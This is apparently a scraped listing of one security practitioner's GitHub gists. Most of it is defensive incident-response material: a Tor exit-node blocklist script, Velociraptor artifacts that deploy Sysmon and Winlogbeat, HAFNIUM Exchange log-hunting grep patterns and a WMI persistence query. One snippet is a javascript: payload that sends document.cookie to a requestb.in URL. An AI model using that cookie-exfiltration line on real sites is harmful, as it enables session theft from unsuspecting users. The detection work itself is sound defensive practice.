I hereby claim:
- I am ecapuano on github.
- I am ecapuano (https://keybase.io/ecapuano) on keybase.
- I have a public key whose fingerprint is 2033 7875 F286 D318 5746 A2A7 27D2 E47B 52A3 720B
To claim this, I am signing this object:
#!/bin/bash | |
# | |
# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good. | |
# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc... | |
# | |
curl https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 > /var/www/html/blocklists/tor_nodes.txt |
I hereby claim:
To claim this, I am signing this object:
javascript:var img = document.createElement('img'); | |
img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie; |
# character set to use for generating passwords | |
chars=abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$% | |
# how many passwords to generate | |
count=100 | |
n=0 | |
while [ $n -le $count ] ; do | |
for i in {1..12} ; do #### 12 defines the max size of the passwords |
id | description | |
---|---|---|
2 | Interactive (logon at keyboard and screen of system) | |
3 | Network (i.e. connection to shared folder on this computer from elsewhere on network) | |
4 | Batch (i.e. scheduled task) | |
5 | Service (Service startup) | |
7 | Unlock (i.e. unlocking unnattended workstation) | |
8 | NetworkCleartext (Logon with credentials sent in the clear text.) | |
9 | NewCredentials such as with RunAs or mapping a network drive with alternate credentials. | |
10 | RemoteInteractive (Terminal Services Remote Desktop or Remote Assistance) | |
11 | CachedInteractive (logon with cached domain credentials) |
name: Custom.CapsSysmon.Deploy | |
description: | | |
A quick and dirty way to download and install sysmon via Velociraptor | |
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT | |
type: CLIENT | |
parameters: | |
- name: sysmonURL | |
default: http://url.to/sysmon8_64.exe | |
- name: binPath | |
default: C:\sysmon.exe |
name: Custom.Winlogbeat.Deploy | |
description: | | |
Quick and dirty way to deploy Winlogbeat via Velociraptor | |
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT | |
type: CLIENT | |
parameters: | |
- name: binaryURL | |
default: http://url.to/winlogbeat.exe | |
- name: installPath | |
default: C:\Program Files\winlogbeat |
# A script that will safely remove adversary footholds on systems. | |
# | |
# Be sure to replace your observables down below. Be careful not to | |
# included LOLBINs as they cannot be safely killed this way. Use | |
# Kill-Threads.ps1 for those. | |
# | |
# Used with great success during CF20 | |
# | |
# Author: Eric Capuano |
# Quick tip to find super common artifacts of the HAFNIUM Exchange attacks with nothing more than IIS logs... | |
# Run this grep pattern against all logs in C:\inetpub\logs\LogFiles\W3SVC1 | |
# | |
# https://twitter.com/eric_capuano | |
# Quick check for likely successful attacks | |
## Bash (faster) | |
egrep -i '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log | |
## PowerShell | |
Select-String -Pattern '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log |
// run against results from Windows.Persistence.PermanentWMIEvents | |
// https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/Persistence/PermanentWMIEvents.yaml | |
SELECT ConsumerDetails.Name AS ConsumerName, ConsumerDetails.CommandLineTemplate AS CommandLineTemplate, FilterDetails.Name AS FilterName, FilterDetails.Query AS FilterQuery, count() AS Count FROM source() | |
// filter common FPs | |
WHERE ConsumerName != "BVTConsumer" | |
AND ConsumerName != "SCM Event Log Consumer" | |
AND ConsumerName != "DellCommandPowerManagerAlertEventConsumer" | |
AND ConsumerName != "DellCommandPowerManagerPolicyChangeEventConsumer" | |
AND ConsumerName != "CmdLineConsumer_WSCEAA" |